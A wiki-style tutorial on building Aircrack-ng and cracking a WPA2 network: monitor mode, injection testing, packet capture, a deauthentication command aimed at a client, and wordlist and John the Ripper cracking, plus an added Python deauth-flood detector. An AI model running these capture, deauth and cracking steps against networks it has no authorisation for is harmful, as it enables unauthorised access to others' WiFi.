Aircrack-ng

From Segfault

Installation

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng-svn
cd aircrack-ng-svn
make
sudo make install prefix=/opt/aircrack-ng
export MANPATH=/opt/aircrack-ng/share/man:$MANPATH

If libgcrypt is installed, we can try to compile with:

port install libgcrypt                             # Macports
yum install libgcrypt-devel                          # Fedora

make gcrypt=true COMMON_CFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"

Note: Please see #1022 ("swap pkh.len when running o a big endian machine") for endianness issues!

Usage

apt-get install iw                         # This will be needed by some of the Aircrack-ng tools

Enable monitoring mode:

airmon-ng start wlan0

Note that for cracking WPA/WPA2, injection needs to work:

$ aireplay-ng --test wlan0
23:01:00  Trying broadcast probe requests...
23:01:00  Injection is working!
23:01:02  Found 1 AP 

23:01:02  Trying directed probe requests...
23:01:02  00:11:22:33:44:55 - channel: 1 - 'Foobar'
23:01:02  Ping (min/avg/max): 1.840ms/19.448ms/37.824ms Power: -35.57
23:01:02  30/30: 100%

OK, injection seems to work. Now, look around your WiFi neighbourhood:

$ airodump-ng wlan0
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:11:22:33:44:55  -19 100     3468    82803  237   1  54e. WPA2 CCMP   PSK  Foobar
 
BSSID              STATION            PWR   Rate     Lost    Frames  Probe
00:11:22:33:44:55  00:22:22:22:22:01   -1   48e- 0      0    31667
00:11:22:33:44:55  00:22:22:22:22:02  -63   54e-54e     0     6291
00:11:22:33:44:55  00:22:22:22:22:03  -68   54e-54e   668    45790 

Dump WiFi packets to a file (the AP above sits on channel 1; `-w` takes a file prefix, so the capture lands in wlan0.pcap-01.cap):

airodump-ng -w wlan0.pcap --bssid 00:11:22:33:44:55 --channel 1 wlan0     # writes wlan0.pcap-01.cap

While airodump-ng is running, generate some packets on the network so that more data is gathered:

aireplay-ng -a 00:11:22:33:44:55 -c 00:22:22:22:22:03  --deauth 1 wlan0
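The deauth step above is also what a defender should be watching for: a burst of deauthentication frames aimed at one station is the tell-tale signature of a handshake-capture attempt. The following script is an added example, not part of the original wiki page or of the Aircrack-ng project. It implements a small deauth-flood detector that reads a radiotap pcap (the format airodump-ng writes), counts management frames of subtype 12 (deauthentication) per sender/target pair, and flags pairs that exceed a threshold inside a time window. The pcap it analyses is constructed in memory so the script runs offline; the MAC addresses are the ones from the airodump-ng output above, and the threshold and window values are assumptions to tune for your environment.

```python
import struct

# pcap / radiotap / 802.11 constants used by the builder and the parser
DLT_IEEE802_11_RADIO = 127   # pcap link type: radiotap header + 802.11 frame
FC_TYPE_MGMT = 0
FC_SUBTYPE_BEACON = 8
FC_SUBTYPE_DEAUTH = 12

# Addresses taken from the airodump-ng output on this page
BSSID = bytes.fromhex("001122334455")
STATION = bytes.fromhex("002222222203")
OTHER = bytes.fromhex("002222222202")


def build_mgmt(subtype, addr1, addr2, addr3, body, seq=0):
    """Assemble an 802.11 management frame behind a minimal 8-byte radiotap header."""
    fc0 = (subtype << 4) | (FC_TYPE_MGMT << 2)          # protocol version 0
    header = struct.pack("<BBH", fc0, 0, 0) + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4)
    radiotap = struct.pack("<BBHI", 0, 0, 8, 0)         # version, pad, length, present bitmap
    return radiotap + header + body


def build_deauth(target, bssid, reason=7, seq=0):
    """Deauth frame addressed to `target`, apparently from `bssid` (sample data for the detector)."""
    return build_mgmt(FC_SUBTYPE_DEAUTH, target, bssid, bssid, struct.pack("<H", reason), seq)


def build_beacon(bssid, ssid):
    """Beacon frame: timestamp, interval, capabilities, SSID element (filtered out by the detector)."""
    body = bytes(8) + struct.pack("<HH", 100, 0x0411) + bytes([0, len(ssid)]) + ssid
    return build_mgmt(FC_SUBTYPE_BEACON, b"\xff" * 6, bssid, bssid, body)


def build_pcap(frames, start_us=1700000000_000000, spacing_us=10000):
    """Write frames into an in-memory pcap file, one frame every `spacing_us` microseconds."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11_RADIO)
    for i, frame in enumerate(frames):
        t = start_us + i * spacing_us
        out += struct.pack("<IIII", t // 1_000_000, t % 1_000_000, len(frame), len(frame)) + frame
    return out


def iter_pcap_packets(data):
    """Yield (timestamp_seconds, packet_bytes) from a radiotap pcap; rejects other link types."""
    magic, = struct.unpack_from("<I", data, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != DLT_IEEE802_11_RADIO:
        raise ValueError("expected link type 127 (radiotap), got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def parse_80211(pkt):
    """Skip the radiotap header; return (type, subtype, addr1, addr2, addr3) or None if truncated."""
    rt_len, = struct.unpack_from("<H", pkt, 2)          # radiotap length field is little-endian
    frame = pkt[rt_len:]
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    return (fc0 >> 2) & 0x3, fc0 >> 4, frame[4:10], frame[10:16], frame[16:22]


def mac(b):
    return ":".join("%02x" % x for x in b)


def max_in_window(timestamps, window):
    """Largest number of timestamps falling inside any `window`-second interval (two-pointer sweep)."""
    ts = sorted(timestamps)
    best, j = 0, 0
    for i in range(len(ts)):
        while j < len(ts) and ts[j] - ts[i] <= window:
            j += 1
        best = max(best, j - i)
    return best


def detect_deauth_flood(pcap, threshold=5, window=10.0):
    """Return {(sender, target): burst_size} for pairs with >= threshold deauths in `window` seconds."""
    seen = {}
    for ts, pkt in iter_pcap_packets(pcap):
        parsed = parse_80211(pkt)
        if parsed is None:
            continue
        ftype, subtype, addr1, addr2, _ = parsed
        if ftype == FC_TYPE_MGMT and subtype == FC_SUBTYPE_DEAUTH:
            seen.setdefault((mac(addr2), mac(addr1)), []).append(ts)
    alerts = {}
    for pair, stamps in seen.items():
        burst = max_in_window(stamps, window)
        if burst >= threshold:
            alerts[pair] = burst
    return alerts


def sample_capture():
    """Constructed capture: one beacon, eight deauths at one station, one stray deauth at another."""
    frames = [build_beacon(BSSID, b"Foobar")]
    frames += [build_deauth(STATION, BSSID, seq=i) for i in range(8)]
    frames.append(build_deauth(OTHER, BSSID, seq=99))
    return build_pcap(frames)


if __name__ == "__main__":
    for (sender, target), n in detect_deauth_flood(sample_capture()).items():
        print("deauth burst: %d frames from %s to %s" % (n, sender, target))
```

The detector keys on sender/target rather than on the BSSID alone, so a single stray deauth (the station `...:02` in the sample) is not merged into the burst against `...:03`. Because a spoofed deauth carries the AP's address as sender, the alert points at the victim pair, not at the attacker; correlating it with the RSSI in airodump's PWR column, or with 802.11w (protected management frames) on the AP, is the practical follow-up.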

Try to crack with a password file:

aircrack-ng -w /usr/share/dict/words -b 00:11:22:33:44:55 wlan0.pcap-01.cap

A good password file is crucial for this to succeed. John The Ripper may be of help here:

john --stdout --incremental:all | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap-01.cap

As there's no way to pause aircrack-ng, we can use JtR's resume feature to continue cracking later on:

john --stdout --incremental:all --session=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap-01.cap
^C

john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap-01.cap

Links